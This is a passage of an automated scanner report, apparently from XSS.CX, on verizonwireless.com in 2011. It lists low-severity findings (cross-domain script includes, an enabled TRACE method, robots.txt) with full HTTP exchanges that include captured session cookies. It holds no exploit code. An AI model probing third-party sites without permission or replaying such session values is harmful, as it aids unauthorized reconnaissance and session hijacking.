       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5.2. http://www.verizonwireless.com/b2c/businessSolutions/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/businessSolutions/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/businessSolutions/index.jsp HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=check#true#1310569615|session#1310569554435-90226#1310571415|PC#1310569554435-90226.17#1311779159; gnVersion=2011Jul12104957

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:06:13 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/homeLogin.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5.3. http://www.verizonwireless.com/b2c/explore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/explore/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/explore/ HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=check#true#1310569634|session#1310569554435-90226#1310571434|PC#1310569554435-90226.17#1311779174; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:06:21 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 16598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xm
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</script>


           <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/splashPageDB.js"></script>    
   <script type="text/javascript" src="http://cache.vzw.com/scripts/widgets/populateJSONWidgets.js"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/db.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/phonefeatures/populateJSONPhoneFeature.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/s11.css" />
   <script type="text/javascript" src="http://cache.vzw.com/scripts/s11.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5.4. http://www.verizonwireless.com/b2c/store/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewPhoneOverviewByDevice&deviceCategoryId=12&lid=//global//shop//phones+and+devices//tablets HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/explore/
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=check#true#1310569668|session#1310569554435-90226#1310571468|PC#1310569554435-90226.17#1311779208; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569617898

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:08:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 20805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

5.5. http://www.verizonwireless.com/b2c/vzwfly  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewShopIndex
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4f58455e445a4a420000; mbox=session#1310569554435-90226#1310571551|PC#1310569554435-90226.17#1311779291|check#true#1310569751; gnVersion=2011Jul12104957; mybizCookie=true; CP=null*; SESSION_VALUE=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1!1310569551080; TIME_CHECKER=1310569589129; __utma=96859928.1761841238.1310569615.1310569615.1310569615.1; __utmb=96859928; __utmc=96859928; __utmz=96859928.1310569615.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; OC=false%7C%7C%20%7C%7C; chkcookie=1310569697006
Content-Type: application/x-www-form-urlencoded
Content-Length: 176

query=item%3DphoneFirst%26action%3DviewShopIndex%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=&rememberMyZip=&state=DE&prevstate=&change=changed&filter=

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Wed, 13 Jul 2011 15:09:41 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-07"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

6. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 4bf8a666e0ad6361

Response

HTTP/1.1 200 OK
Server: None
Date: Wed, 13 Jul 2011 15:06:13 GMT
Content-type: message/http
Content-length: 571
Connection: keep-alive

TRACE / HTTP/1.0
Host: www.verizonwireless.com
Cookie: 4bf8a666e0ad6361; JSESSIONIDB2C=TLTXTd0PNbgTrsTlVPZ1t5vny0KjdlV29PSZlQhmGvQrB2tklPbY!1397394466!sanders!5104!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7d72e45525d5f4f58455e445a4a4225c0; NSC_xxx_hwt=ffffffffa17bccd945525d5f4
...[SNIP]...

7. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/businessSolutions/index.jsp

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.verizonwireless.com

Response

HTTP/1.1 200 OK
Server: None
Date: Wed, 13 Jul 2011 15:06:14 GMT
Content-type: text/plain
Last-modified: Fri, 04 Dec 2009 19:05:55 GMT
Content-length: 558
Etag: "22e-4b195d93"
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Disallow: /cgi-bin
Disallow: /scripts
Disallow: /Scripts
Disallow: /perl
Disallow: /images_b2c
Disallow: /b2b_images
Disallow: /images
Disallow: /img
Disallow: /*.gif$
Disallow: /*.jpg$

...[SNIP]...

Report generated by XSS.CX at Wed Jul 13 10:21:47 CDT 2011.